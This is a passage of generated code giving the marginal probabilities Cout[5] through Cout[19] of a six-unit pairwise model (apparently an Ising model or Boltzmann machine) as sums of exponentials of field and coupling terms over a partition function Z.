]+H[2]+H[4]+H[5]+J[0]+J[1]+J[3]+J[4]+J[5]+J[7]+J[8]+J[10]+J[11]+J[14])+exp(+H[0]+H[1]+H[2]+H[3]+H[4]+J[0]+J[1]+J[2]+J[3]+J[5]+J[6]+J[7]+J[9]+J[10]+J[12])+exp(+H[0]+H[1]+H[2]+H[3]+H[4]+H[5]+J[0]+J[1]+J[2]+J[3]+J[4]+J[5]+J[6]+J[7]+J[8]+J[9]+J[10]+J[11]+J[12]+J[13]+J[14]))/Z
Cout[5] = (+exp(+H[5]+0)+exp(+H[4]+H[5]+J[14])+exp(+H[3]+H[5]+J[13])+exp(+H[3]+H[4]+H[5]+J[12]+J[13]+J[14])+exp(+H[2]+H[5]+J[11])+exp(+H[2]+H[4]+H[5]+J[10]+J[11]+J[14])+exp(+H[2]+H[3]+H[5]+J[9]+J[11]+J[13])+exp(+H[2]+H[3]+H[4]+H[5]+J[9]+J[10]+J[11]+J[12]+J[13]+J[14])+exp(+H[1]+H[5]+J[8])+exp(+H[1]+H[4]+H[5]+J[7]+J[8]+J[14])+exp(+H[1]+H[3]+H[5]+J[6]+J[8]+J[13])+exp(+H[1]+H[3]+H[4]+H[5]+J[6]+J[7]+J[8]+J[12]+J[13]+J[14])+exp(+H[1]+H[2]+H[5]+J[5]+J[8]+J[11])+exp(+H[1]+H[2]+H[4]+H[5]+J[5]+J[7]+J[8]+J[10]+J[11]+J[14])+exp(+H[1]+H[2]+H[3]+H[5]+J[5]+J[6]+J[8]+J[9]+J[11]+J[13])+exp(+H[1]+H[2]+H[3]+H[4]+H[5]+J[5]+J[6]+J[7]+J[8]+J[9]+J[10]+J[11]+J[12]+J[13]+J[14])+exp(+H[0]+H[5]+J[4])+exp(+H[0]+H[4]+H[5]+J[3]+J[4]+J[14])+exp(+H[0]+H[3]+H[5]+J[2]+J[4]+J[13])+exp(+H[0]+H[3]+H[4]+H[5]+J[2]+J[3]+J[4]+J[12]+J[13]+J[14])+exp(+H[0]+H[2]+H[5]+J[1]+J[4]+J[11])+exp(+H[0]+H[2]+H[4]+H[5]+J[1]+J[3]+J[4]+J[10]+J[11]+J[14])+exp(+H[0]+H[2]+H[3]+H[5]+J[1]+J[2]+J[4]+J[9]+J[11]+J[13])+exp(+H[0]+H[2]+H[3]+H[4]+H[5]+J[1]+J[2]+J[3]+J[4]+J[9]+J[10]+J[11]+J[12]+J[13]+J[14])+exp(+H[0]+H[1]+H[5]+J[0]+J[4]+J[8])+exp(+H[0]+H[1]+H[4]+H[5]+J[0]+J[3]+J[4]+J[7]+J[8]+J[14])+exp(+H[0]+H[1]+H[3]+H[5]+J[0]+J[2]+J[4]+J[6]+J[8]+J[13])+exp(+H[0]+H[1]+H[3]+H[4]+H[5]+J[0]+J[2]+J[3]+J[4]+J[6]+J[7]+J[8]+J[12]+J[13]+J[14])+exp(+H[0]+H[1]+H[2]+H[5]+J[0]+J[1]+J[4]+J[5]+J[8]+J[11])+exp(+H[0]+H[1]+H[2]+H[4]+H[5]+J[0]+J[1]+J[3]+J[4]+J[5]+J[7]+J[8]+J[10]+J[11]+J[14])+exp(+H[0]+H[1]+H[2]+H[3]+H[5]+J[0]+J[1]+J[2]+J[4]+J[5]+J[6]+J[8]+J[9]+J[11]+J[13])+exp(+H[0]+H[1]+H[2]+H[3]+H[4]+H[5]+J[0]+J[1]+J[2]+J[3]+J[4]+J[5]+J[6]+J[7]+J[8]+J[9]+J[10]+J[11]+J[12]+J[13]+J[14]))/Z
Cout[6] = (+exp(+H[0]+H[1]+J[0])+exp(+H[0]+H[1]+H[5]+J[0]+J[4]+J[8])+exp(+H[0]+H[1]+H[4]+J[0]+J[3]+J[7])+exp(+H[0]+H[1]+H[4]+H[5]+J[0]+J[3]+J[4]+J[7]+J[8]+J[14])+exp(+H[0]+H[1]+H[3]+J[0]+J[2]+J[6])+exp(+H[0]+H[1]+H[3]+H[5]+J[0]+J[2]+J[4]+J[6]+J[8]+J[13])+exp(+H[0]+H[1]+H[3]+H[4]+J[0]+J[2]+J[3]+J[6]+J[7]+J[12])+exp(+H[0]+H[1]+H[3]+H[4]+H[5]+J[0]+J[2]+J[3]+J[4]+J[6]+J[7]+J[8]+J[12]+J[13]+J[14])+exp(+H[0]+H[1]+H[2]+J[0]+J[1]+J[5])+exp(+H[0]+H[1]+H[2]+H[5]+J[0]+J[1]+J[4]+J[5]+J[8]+J[11])+exp(+H[0]+H[1]+H[2]+H[4]+J[0]+J[1]+J[3]+J[5]+J[7]+J[10])+exp(+H[0]+H[1]+H[2]+H[4]+H[5]+J[0]+J[1]+J[3]+J[4]+J[5]+J[7]+J[8]+J[10]+J[11]+J[14])+exp(+H[0]+H[1]+H[2]+H[3]+J[0]+J[1]+J[2]+J[5]+J[6]+J[9])+exp(+H[0]+H[1]+H[2]+H[3]+H[5]+J[0]+J[1]+J[2]+J[4]+J[5]+J[6]+J[8]+J[9]+J[11]+J[13])+exp(+H[0]+H[1]+H[2]+H[3]+H[4]+J[0]+J[1]+J[2]+J[3]+J[5]+J[6]+J[7]+J[9]+J[10]+J[12])+exp(+H[0]+H[1]+H[2]+H[3]+H[4]+H[5]+J[0]+J[1]+J[2]+J[3]+J[4]+J[5]+J[6]+J[7]+J[8]+J[9]+J[10]+J[11]+J[12]+J[13]+J[14]))/Z
Cout[7] = (+exp(+H[0]+H[2]+J[1])+exp(+H[0]+H[2]+H[5]+J[1]+J[4]+J[11])+exp(+H[0]+H[2]+H[4]+J[1]+J[3]+J[10])+exp(+H[0]+H[2]+H[4]+H[5]+J[1]+J[3]+J[4]+J[10]+J[11]+J[14])+exp(+H[0]+H[2]+H[3]+J[1]+J[2]+J[9])+exp(+H[0]+H[2]+H[3]+H[5]+J[1]+J[2]+J[4]+J[9]+J[11]+J[13])+exp(+H[0]+H[2]+H[3]+H[4]+J[1]+J[2]+J[3]+J[9]+J[10]+J[12])+exp(+H[0]+H[2]+H[3]+H[4]+H[5]+J[1]+J[2]+J[3]+J[4]+J[9]+J[10]+J[11]+J[12]+J[13]+J[14])+exp(+H[0]+H[1]+H[2]+J[0]+J[1]+J[5])+exp(+H[0]+H[1]+H[2]+H[5]+J[0]+J[1]+J[4]+J[5]+J[8]+J[11])+exp(+H[0]+H[1]+H[2]+H[4]+J[0]+J[1]+J[3]+J[5]+J[7]+J[10])+exp(+H[0]+H[1]+H[2]+H[4]+H[5]+J[0]+J[1]+J[3]+J[4]+J[5]+J[7]+J[8]+J[10]+J[11]+J[14])+exp(+H[0]+H[1]+H[2]+H[3]+J[0]+J[1]+J[2]+J[5]+J[6]+J[9])+exp(+H[0]+H[1]+H[2]+H[3]+H[5]+J[0]+J[1]+J[2]+J[4]+J[5]+J[6]+J[8]+J[9]+J[11]+J[13])+exp(+H[0]+H[1]+H[2]+H[3]+H[4]+J[0]+J[1]+J[2]+J[3]+J[5]+J[6]+J[7]+J[9]+J[10]+J[12])+exp(+H[0]+H[1]+H[2]+H[3]+H[4]+H[5]+J[0]+J[1]+J[2]+J[3]+J[4]+J[5]+J[6]+J[7]+J[8]+J[9]+J[10]+J[11]+J[12]+J[13]+J[14]))/Z
Cout[8] = (+exp(+H[0]+H[3]+J[2])+exp(+H[0]+H[3]+H[5]+J[2]+J[4]+J[13])+exp(+H[0]+H[3]+H[4]+J[2]+J[3]+J[12])+exp(+H[0]+H[3]+H[4]+H[5]+J[2]+J[3]+J[4]+J[12]+J[13]+J[14])+exp(+H[0]+H[2]+H[3]+J[1]+J[2]+J[9])+exp(+H[0]+H[2]+H[3]+H[5]+J[1]+J[2]+J[4]+J[9]+J[11]+J[13])+exp(+H[0]+H[2]+H[3]+H[4]+J[1]+J[2]+J[3]+J[9]+J[10]+J[12])+exp(+H[0]+H[2]+H[3]+H[4]+H[5]+J[1]+J[2]+J[3]+J[4]+J[9]+J[10]+J[11]+J[12]+J[13]+J[14])+exp(+H[0]+H[1]+H[3]+J[0]+J[2]+J[6])+exp(+H[0]+H[1]+H[3]+H[5]+J[0]+J[2]+J[4]+J[6]+J[8]+J[13])+exp(+H[0]+H[1]+H[3]+H[4]+J[0]+J[2]+J[3]+J[6]+J[7]+J[12])+exp(+H[0]+H[1]+H[3]+H[4]+H[5]+J[0]+J[2]+J[3]+J[4]+J[6]+J[7]+J[8]+J[12]+J[13]+J[14])+exp(+H[0]+H[1]+H[2]+H[3]+J[0]+J[1]+J[2]+J[5]+J[6]+J[9])+exp(+H[0]+H[1]+H[2]+H[3]+H[5]+J[0]+J[1]+J[2]+J[4]+J[5]+J[6]+J[8]+J[9]+J[11]+J[13])+exp(+H[0]+H[1]+H[2]+H[3]+H[4]+J[0]+J[1]+J[2]+J[3]+J[5]+J[6]+J[7]+J[9]+J[10]+J[12])+exp(+H[0]+H[1]+H[2]+H[3]+H[4]+H[5]+J[0]+J[1]+J[2]+J[3]+J[4]+J[5]+J[6]+J[7]+J[8]+J[9]+J[10]+J[11]+J[12]+J[13]+J[14]))/Z
Cout[9] = (+exp(+H[0]+H[4]+J[3])+exp(+H[0]+H[4]+H[5]+J[3]+J[4]+J[14])+exp(+H[0]+H[3]+H[4]+J[2]+J[3]+J[12])+exp(+H[0]+H[3]+H[4]+H[5]+J[2]+J[3]+J[4]+J[12]+J[13]+J[14])+exp(+H[0]+H[2]+H[4]+J[1]+J[3]+J[10])+exp(+H[0]+H[2]+H[4]+H[5]+J[1]+J[3]+J[4]+J[10]+J[11]+J[14])+exp(+H[0]+H[2]+H[3]+H[4]+J[1]+J[2]+J[3]+J[9]+J[10]+J[12])+exp(+H[0]+H[2]+H[3]+H[4]+H[5]+J[1]+J[2]+J[3]+J[4]+J[9]+J[10]+J[11]+J[12]+J[13]+J[14])+exp(+H[0]+H[1]+H[4]+J[0]+J[3]+J[7])+exp(+H[0]+H[1]+H[4]+H[5]+J[0]+J[3]+J[4]+J[7]+J[8]+J[14])+exp(+H[0]+H[1]+H[3]+H[4]+J[0]+J[2]+J[3]+J[6]+J[7]+J[12])+exp(+H[0]+H[1]+H[3]+H[4]+H[5]+J[0]+J[2]+J[3]+J[4]+J[6]+J[7]+J[8]+J[12]+J[13]+J[14])+exp(+H[0]+H[1]+H[2]+H[4]+J[0]+J[1]+J[3]+J[5]+J[7]+J[10])+exp(+H[0]+H[1]+H[2]+H[4]+H[5]+J[0]+J[1]+J[3]+J[4]+J[5]+J[7]+J[8]+J[10]+J[11]+J[14])+exp(+H[0]+H[1]+H[2]+H[3]+H[4]+J[0]+J[1]+J[2]+J[3]+J[5]+J[6]+J[7]+J[9]+J[10]+J[12])+exp(+H[0]+H[1]+H[2]+H[3]+H[4]+H[5]+J[0]+J[1]+J[2]+J[3]+J[4]+J[5]+J[6]+J[7]+J[8]+J[9]+J[10]+J[11]+J[12]+J[13]+J[14]))/Z
Cout[10] = (+exp(+H[0]+H[5]+J[4])+exp(+H[0]+H[4]+H[5]+J[3]+J[4]+J[14])+exp(+H[0]+H[3]+H[5]+J[2]+J[4]+J[13])+exp(+H[0]+H[3]+H[4]+H[5]+J[2]+J[3]+J[4]+J[12]+J[13]+J[14])+exp(+H[0]+H[2]+H[5]+J[1]+J[4]+J[11])+exp(+H[0]+H[2]+H[4]+H[5]+J[1]+J[3]+J[4]+J[10]+J[11]+J[14])+exp(+H[0]+H[2]+H[3]+H[5]+J[1]+J[2]+J[4]+J[9]+J[11]+J[13])+exp(+H[0]+H[2]+H[3]+H[4]+H[5]+J[1]+J[2]+J[3]+J[4]+J[9]+J[10]+J[11]+J[12]+J[13]+J[14])+exp(+H[0]+H[1]+H[5]+J[0]+J[4]+J[8])+exp(+H[0]+H[1]+H[4]+H[5]+J[0]+J[3]+J[4]+J[7]+J[8]+J[14])+exp(+H[0]+H[1]+H[3]+H[5]+J[0]+J[2]+J[4]+J[6]+J[8]+J[13])+exp(+H[0]+H[1]+H[3]+H[4]+H[5]+J[0]+J[2]+J[3]+J[4]+J[6]+J[7]+J[8]+J[12]+J[13]+J[14])+exp(+H[0]+H[1]+H[2]+H[5]+J[0]+J[1]+J[4]+J[5]+J[8]+J[11])+exp(+H[0]+H[1]+H[2]+H[4]+H[5]+J[0]+J[1]+J[3]+J[4]+J[5]+J[7]+J[8]+J[10]+J[11]+J[14])+exp(+H[0]+H[1]+H[2]+H[3]+H[5]+J[0]+J[1]+J[2]+J[4]+J[5]+J[6]+J[8]+J[9]+J[11]+J[13])+exp(+H[0]+H[1]+H[2]+H[3]+H[4]+H[5]+J[0]+J[1]+J[2]+J[3]+J[4]+J[5]+J[6]+J[7]+J[8]+J[9]+J[10]+J[11]+J[12]+J[13]+J[14]))/Z
Cout[11] = (+exp(+H[1]+H[2]+J[5])+exp(+H[1]+H[2]+H[5]+J[5]+J[8]+J[11])+exp(+H[1]+H[2]+H[4]+J[5]+J[7]+J[10])+exp(+H[1]+H[2]+H[4]+H[5]+J[5]+J[7]+J[8]+J[10]+J[11]+J[14])+exp(+H[1]+H[2]+H[3]+J[5]+J[6]+J[9])+exp(+H[1]+H[2]+H[3]+H[5]+J[5]+J[6]+J[8]+J[9]+J[11]+J[13])+exp(+H[1]+H[2]+H[3]+H[4]+J[5]+J[6]+J[7]+J[9]+J[10]+J[12])+exp(+H[1]+H[2]+H[3]+H[4]+H[5]+J[5]+J[6]+J[7]+J[8]+J[9]+J[10]+J[11]+J[12]+J[13]+J[14])+exp(+H[0]+H[1]+H[2]+J[0]+J[1]+J[5])+exp(+H[0]+H[1]+H[2]+H[5]+J[0]+J[1]+J[4]+J[5]+J[8]+J[11])+exp(+H[0]+H[1]+H[2]+H[4]+J[0]+J[1]+J[3]+J[5]+J[7]+J[10])+exp(+H[0]+H[1]+H[2]+H[4]+H[5]+J[0]+J[1]+J[3]+J[4]+J[5]+J[7]+J[8]+J[10]+J[11]+J[14])+exp(+H[0]+H[1]+H[2]+H[3]+J[0]+J[1]+J[2]+J[5]+J[6]+J[9])+exp(+H[0]+H[1]+H[2]+H[3]+H[5]+J[0]+J[1]+J[2]+J[4]+J[5]+J[6]+J[8]+J[9]+J[11]+J[13])+exp(+H[0]+H[1]+H[2]+H[3]+H[4]+J[0]+J[1]+J[2]+J[3]+J[5]+J[6]+J[7]+J[9]+J[10]+J[12])+exp(+H[0]+H[1]+H[2]+H[3]+H[4]+H[5]+J[0]+J[1]+J[2]+J[3]+J[4]+J[5]+J[6]+J[7]+J[8]+J[9]+J[10]+J[11]+J[12]+J[13]+J[14]))/Z
Cout[12] = (+exp(+H[1]+H[3]+J[6])+exp(+H[1]+H[3]+H[5]+J[6]+J[8]+J[13])+exp(+H[1]+H[3]+H[4]+J[6]+J[7]+J[12])+exp(+H[1]+H[3]+H[4]+H[5]+J[6]+J[7]+J[8]+J[12]+J[13]+J[14])+exp(+H[1]+H[2]+H[3]+J[5]+J[6]+J[9])+exp(+H[1]+H[2]+H[3]+H[5]+J[5]+J[6]+J[8]+J[9]+J[11]+J[13])+exp(+H[1]+H[2]+H[3]+H[4]+J[5]+J[6]+J[7]+J[9]+J[10]+J[12])+exp(+H[1]+H[2]+H[3]+H[4]+H[5]+J[5]+J[6]+J[7]+J[8]+J[9]+J[10]+J[11]+J[12]+J[13]+J[14])+exp(+H[0]+H[1]+H[3]+J[0]+J[2]+J[6])+exp(+H[0]+H[1]+H[3]+H[5]+J[0]+J[2]+J[4]+J[6]+J[8]+J[13])+exp(+H[0]+H[1]+H[3]+H[4]+J[0]+J[2]+J[3]+J[6]+J[7]+J[12])+exp(+H[0]+H[1]+H[3]+H[4]+H[5]+J[0]+J[2]+J[3]+J[4]+J[6]+J[7]+J[8]+J[12]+J[13]+J[14])+exp(+H[0]+H[1]+H[2]+H[3]+J[0]+J[1]+J[2]+J[5]+J[6]+J[9])+exp(+H[0]+H[1]+H[2]+H[3]+H[5]+J[0]+J[1]+J[2]+J[4]+J[5]+J[6]+J[8]+J[9]+J[11]+J[13])+exp(+H[0]+H[1]+H[2]+H[3]+H[4]+J[0]+J[1]+J[2]+J[3]+J[5]+J[6]+J[7]+J[9]+J[10]+J[12])+exp(+H[0]+H[1]+H[2]+H[3]+H[4]+H[5]+J[0]+J[1]+J[2]+J[3]+J[4]+J[5]+J[6]+J[7]+J[8]+J[9]+J[10]+J[11]+J[12]+J[13]+J[14]))/Z
Cout[13] = (+exp(+H[1]+H[4]+J[7])+exp(+H[1]+H[4]+H[5]+J[7]+J[8]+J[14])+exp(+H[1]+H[3]+H[4]+J[6]+J[7]+J[12])+exp(+H[1]+H[3]+H[4]+H[5]+J[6]+J[7]+J[8]+J[12]+J[13]+J[14])+exp(+H[1]+H[2]+H[4]+J[5]+J[7]+J[10])+exp(+H[1]+H[2]+H[4]+H[5]+J[5]+J[7]+J[8]+J[10]+J[11]+J[14])+exp(+H[1]+H[2]+H[3]+H[4]+J[5]+J[6]+J[7]+J[9]+J[10]+J[12])+exp(+H[1]+H[2]+H[3]+H[4]+H[5]+J[5]+J[6]+J[7]+J[8]+J[9]+J[10]+J[11]+J[12]+J[13]+J[14])+exp(+H[0]+H[1]+H[4]+J[0]+J[3]+J[7])+exp(+H[0]+H[1]+H[4]+H[5]+J[0]+J[3]+J[4]+J[7]+J[8]+J[14])+exp(+H[0]+H[1]+H[3]+H[4]+J[0]+J[2]+J[3]+J[6]+J[7]+J[12])+exp(+H[0]+H[1]+H[3]+H[4]+H[5]+J[0]+J[2]+J[3]+J[4]+J[6]+J[7]+J[8]+J[12]+J[13]+J[14])+exp(+H[0]+H[1]+H[2]+H[4]+J[0]+J[1]+J[3]+J[5]+J[7]+J[10])+exp(+H[0]+H[1]+H[2]+H[4]+H[5]+J[0]+J[1]+J[3]+J[4]+J[5]+J[7]+J[8]+J[10]+J[11]+J[14])+exp(+H[0]+H[1]+H[2]+H[3]+H[4]+J[0]+J[1]+J[2]+J[3]+J[5]+J[6]+J[7]+J[9]+J[10]+J[12])+exp(+H[0]+H[1]+H[2]+H[3]+H[4]+H[5]+J[0]+J[1]+J[2]+J[3]+J[4]+J[5]+J[6]+J[7]+J[8]+J[9]+J[10]+J[11]+J[12]+J[13]+J[14]))/Z
Cout[14] = (+exp(+H[1]+H[5]+J[8])+exp(+H[1]+H[4]+H[5]+J[7]+J[8]+J[14])+exp(+H[1]+H[3]+H[5]+J[6]+J[8]+J[13])+exp(+H[1]+H[3]+H[4]+H[5]+J[6]+J[7]+J[8]+J[12]+J[13]+J[14])+exp(+H[1]+H[2]+H[5]+J[5]+J[8]+J[11])+exp(+H[1]+H[2]+H[4]+H[5]+J[5]+J[7]+J[8]+J[10]+J[11]+J[14])+exp(+H[1]+H[2]+H[3]+H[5]+J[5]+J[6]+J[8]+J[9]+J[11]+J[13])+exp(+H[1]+H[2]+H[3]+H[4]+H[5]+J[5]+J[6]+J[7]+J[8]+J[9]+J[10]+J[11]+J[12]+J[13]+J[14])+exp(+H[0]+H[1]+H[5]+J[0]+J[4]+J[8])+exp(+H[0]+H[1]+H[4]+H[5]+J[0]+J[3]+J[4]+J[7]+J[8]+J[14])+exp(+H[0]+H[1]+H[3]+H[5]+J[0]+J[2]+J[4]+J[6]+J[8]+J[13])+exp(+H[0]+H[1]+H[3]+H[4]+H[5]+J[0]+J[2]+J[3]+J[4]+J[6]+J[7]+J[8]+J[12]+J[13]+J[14])+exp(+H[0]+H[1]+H[2]+H[5]+J[0]+J[1]+J[4]+J[5]+J[8]+J[11])+exp(+H[0]+H[1]+H[2]+H[4]+H[5]+J[0]+J[1]+J[3]+J[4]+J[5]+J[7]+J[8]+J[10]+J[11]+J[14])+exp(+H[0]+H[1]+H[2]+H[3]+H[5]+J[0]+J[1]+J[2]+J[4]+J[5]+J[6]+J[8]+J[9]+J[11]+J[13])+exp(+H[0]+H[1]+H[2]+H[3]+H[4]+H[5]+J[0]+J[1]+J[2]+J[3]+J[4]+J[5]+J[6]+J[7]+J[8]+J[9]+J[10]+J[11]+J[12]+J[13]+J[14]))/Z
Cout[15] = (+exp(+H[2]+H[3]+J[9])+exp(+H[2]+H[3]+H[5]+J[9]+J[11]+J[13])+exp(+H[2]+H[3]+H[4]+J[9]+J[10]+J[12])+exp(+H[2]+H[3]+H[4]+H[5]+J[9]+J[10]+J[11]+J[12]+J[13]+J[14])+exp(+H[1]+H[2]+H[3]+J[5]+J[6]+J[9])+exp(+H[1]+H[2]+H[3]+H[5]+J[5]+J[6]+J[8]+J[9]+J[11]+J[13])+exp(+H[1]+H[2]+H[3]+H[4]+J[5]+J[6]+J[7]+J[9]+J[10]+J[12])+exp(+H[1]+H[2]+H[3]+H[4]+H[5]+J[5]+J[6]+J[7]+J[8]+J[9]+J[10]+J[11]+J[12]+J[13]+J[14])+exp(+H[0]+H[2]+H[3]+J[1]+J[2]+J[9])+exp(+H[0]+H[2]+H[3]+H[5]+J[1]+J[2]+J[4]+J[9]+J[11]+J[13])+exp(+H[0]+H[2]+H[3]+H[4]+J[1]+J[2]+J[3]+J[9]+J[10]+J[12])+exp(+H[0]+H[2]+H[3]+H[4]+H[5]+J[1]+J[2]+J[3]+J[4]+J[9]+J[10]+J[11]+J[12]+J[13]+J[14])+exp(+H[0]+H[1]+H[2]+H[3]+J[0]+J[1]+J[2]+J[5]+J[6]+J[9])+exp(+H[0]+H[1]+H[2]+H[3]+H[5]+J[0]+J[1]+J[2]+J[4]+J[5]+J[6]+J[8]+J[9]+J[11]+J[13])+exp(+H[0]+H[1]+H[2]+H[3]+H[4]+J[0]+J[1]+J[2]+J[3]+J[5]+J[6]+J[7]+J[9]+J[10]+J[12])+exp(+H[0]+H[1]+H[2]+H[3]+H[4]+H[5]+J[0]+J[1]+J[2]+J[3]+J[4]+J[5]+J[6]+J[7]+J[8]+J[9]+J[10]+J[11]+J[12]+J[13]+J[14]))/Z
Cout[16] = (+exp(+H[2]+H[4]+J[10])+exp(+H[2]+H[4]+H[5]+J[10]+J[11]+J[14])+exp(+H[2]+H[3]+H[4]+J[9]+J[10]+J[12])+exp(+H[2]+H[3]+H[4]+H[5]+J[9]+J[10]+J[11]+J[12]+J[13]+J[14])+exp(+H[1]+H[2]+H[4]+J[5]+J[7]+J[10])+exp(+H[1]+H[2]+H[4]+H[5]+J[5]+J[7]+J[8]+J[10]+J[11]+J[14])+exp(+H[1]+H[2]+H[3]+H[4]+J[5]+J[6]+J[7]+J[9]+J[10]+J[12])+exp(+H[1]+H[2]+H[3]+H[4]+H[5]+J[5]+J[6]+J[7]+J[8]+J[9]+J[10]+J[11]+J[12]+J[13]+J[14])+exp(+H[0]+H[2]+H[4]+J[1]+J[3]+J[10])+exp(+H[0]+H[2]+H[4]+H[5]+J[1]+J[3]+J[4]+J[10]+J[11]+J[14])+exp(+H[0]+H[2]+H[3]+H[4]+J[1]+J[2]+J[3]+J[9]+J[10]+J[12])+exp(+H[0]+H[2]+H[3]+H[4]+H[5]+J[1]+J[2]+J[3]+J[4]+J[9]+J[10]+J[11]+J[12]+J[13]+J[14])+exp(+H[0]+H[1]+H[2]+H[4]+J[0]+J[1]+J[3]+J[5]+J[7]+J[10])+exp(+H[0]+H[1]+H[2]+H[4]+H[5]+J[0]+J[1]+J[3]+J[4]+J[5]+J[7]+J[8]+J[10]+J[11]+J[14])+exp(+H[0]+H[1]+H[2]+H[3]+H[4]+J[0]+J[1]+J[2]+J[3]+J[5]+J[6]+J[7]+J[9]+J[10]+J[12])+exp(+H[0]+H[1]+H[2]+H[3]+H[4]+H[5]+J[0]+J[1]+J[2]+J[3]+J[4]+J[5]+J[6]+J[7]+J[8]+J[9]+J[10]+J[11]+J[12]+J[13]+J[14]))/Z
Cout[17] = (+exp(+H[2]+H[5]+J[11])+exp(+H[2]+H[4]+H[5]+J[10]+J[11]+J[14])+exp(+H[2]+H[3]+H[5]+J[9]+J[11]+J[13])+exp(+H[2]+H[3]+H[4]+H[5]+J[9]+J[10]+J[11]+J[12]+J[13]+J[14])+exp(+H[1]+H[2]+H[5]+J[5]+J[8]+J[11])+exp(+H[1]+H[2]+H[4]+H[5]+J[5]+J[7]+J[8]+J[10]+J[11]+J[14])+exp(+H[1]+H[2]+H[3]+H[5]+J[5]+J[6]+J[8]+J[9]+J[11]+J[13])+exp(+H[1]+H[2]+H[3]+H[4]+H[5]+J[5]+J[6]+J[7]+J[8]+J[9]+J[10]+J[11]+J[12]+J[13]+J[14])+exp(+H[0]+H[2]+H[5]+J[1]+J[4]+J[11])+exp(+H[0]+H[2]+H[4]+H[5]+J[1]+J[3]+J[4]+J[10]+J[11]+J[14])+exp(+H[0]+H[2]+H[3]+H[5]+J[1]+J[2]+J[4]+J[9]+J[11]+J[13])+exp(+H[0]+H[2]+H[3]+H[4]+H[5]+J[1]+J[2]+J[3]+J[4]+J[9]+J[10]+J[11]+J[12]+J[13]+J[14])+exp(+H[0]+H[1]+H[2]+H[5]+J[0]+J[1]+J[4]+J[5]+J[8]+J[11])+exp(+H[0]+H[1]+H[2]+H[4]+H[5]+J[0]+J[1]+J[3]+J[4]+J[5]+J[7]+J[8]+J[10]+J[11]+J[14])+exp(+H[0]+H[1]+H[2]+H[3]+H[5]+J[0]+J[1]+J[2]+J[4]+J[5]+J[6]+J[8]+J[9]+J[11]+J[13])+exp(+H[0]+H[1]+H[2]+H[3]+H[4]+H[5]+J[0]+J[1]+J[2]+J[3]+J[4]+J[5]+J[6]+J[7]+J[8]+J[9]+J[10]+J[11]+J[12]+J[13]+J[14]))/Z
Cout[18] = (+exp(+H[3]+H[4]+J[12])+exp(+H[3]+H[4]+H[5]+J[12]+J[13]+J[14])+exp(+H[2]+H[3]+H[4]+J[9]+J[10]+J[12])+exp(+H[2]+H[3]+H[4]+H[5]+J[9]+J[10]+J[11]+J[12]+J[13]+J[14])+exp(+H[1]+H[3]+H[4]+J[6]+J[7]+J[12])+exp(+H[1]+H[3]+H[4]+H[5]+J[6]+J[7]+J[8]+J[12]+J[13]+J[14])+exp(+H[1]+H[2]+H[3]+H[4]+J[5]+J[6]+J[7]+J[9]+J[10]+J[12])+exp(+H[1]+H[2]+H[3]+H[4]+H[5]+J[5]+J[6]+J[7]+J[8]+J[9]+J[10]+J[11]+J[12]+J[13]+J[14])+exp(+H[0]+H[3]+H[4]+J[2]+J[3]+J[12])+exp(+H[0]+H[3]+H[4]+H[5]+J[2]+J[3]+J[4]+J[12]+J[13]+J[14])+exp(+H[0]+H[2]+H[3]+H[4]+J[1]+J[2]+J[3]+J[9]+J[10]+J[12])+exp(+H[0]+H[2]+H[3]+H[4]+H[5]+J[1]+J[2]+J[3]+J[4]+J[9]+J[10]+J[11]+J[12]+J[13]+J[14])+exp(+H[0]+H[1]+H[3]+H[4]+J[0]+J[2]+J[3]+J[6]+J[7]+J[12])+exp(+H[0]+H[1]+H[3]+H[4]+H[5]+J[0]+J[2]+J[3]+J[4]+J[6]+J[7]+J[8]+J[12]+J[13]+J[14])+exp(+H[0]+H[1]+H[2]+H[3]+H[4]+J[0]+J[1]+J[2]+J[3]+J[5]+J[6]+J[7]+J[9]+J[10]+J[12])+exp(+H[0]+H[1]+H[2]+H[3]+H[4]+H[5]+J[0]+J[1]+J[2]+J[3]+J[4]+J[5]+J[6]+J[7]+J[8]+J[9]+J[10]+J[11]+J[12]+J[13]+J[14]))/Z
Cout[19] = (+exp(+H[3]+H[5]+J[13])+exp(+H[3]+H[4]+H[5]+J[12]+J[13]+J[14])+exp(+H[2]+H[3]+H[5]+J[9]+J[11]+J[13])+exp(+H[2]+H[3]+H[4]+H[5]+J[9]+J[10]+J[11]+J[12]+J[13]+J[14])+exp(+H[1]+H[3]+H[5]+J[6]+J[8]+J[13])+exp(+H[1]+H[3]+H[4]+H[5]+J[6]+J[7]+J[8]+J[12]+J[13]+J[14])+exp(+H[1]+H[2]+H[3]+H[5]+J[5]+J[6]+J[8]+J[9]+J[11]+J[13])+exp(+H[1]+H[2]+H[3]+H[4]+H[5]+J[5]+J[6]+J[7]+J[8]+J[9]+J[10]+J[11]+J[12]+J[13]+J[14])+exp(+H[0]+H[3]+H[5]+J[2]+J[4]+J[13])+exp(+H[0]+H[3]+H[4]+H[5]+J[2]+J[3]+J[4]+J[12]+J[13]+J[14])+exp(+H[0]+H[2]+H[3]+H[5]+J[1]+J[2]+J[4]+J[9]+J[11]+J[13])+exp(+H[0]+H[2]+H[3]+H[4]+H[5]+J[1]+J[2]+J[3]+J[4]+J[9]+J[10]+J[11]+J[12]+J[13]+J[14])+exp(+H[0]+H[1]+H[3]+H[5]+J[0]+J[2]+J[4]+J[6]+J[8]+J[13])+exp(+H[0]+H[1]+H[3]+H[4]+H[5]+J[0]+J[2]+J[3]+J[4]+J[6]+J[7]+J[8]+J[12]+J[13]+J[14])+exp(+H[0]+H[1]+H[2]+H[3]+H[5]+J[0]+J[1]+J[2]+J[4]+J[5]+J[6]+J[8]+J[9]+J[11]+J[13])+exp(+H[0]+H[1]+H[2]+H[3]+H[4]+H[5]+J[0]+J[1]+J[2]+J[3]+J[4]+J[5]+J[6]+J[7]+J[8]+J[9]+J[10]+J[11]+J[12]+J[13]+J[14]))/Z
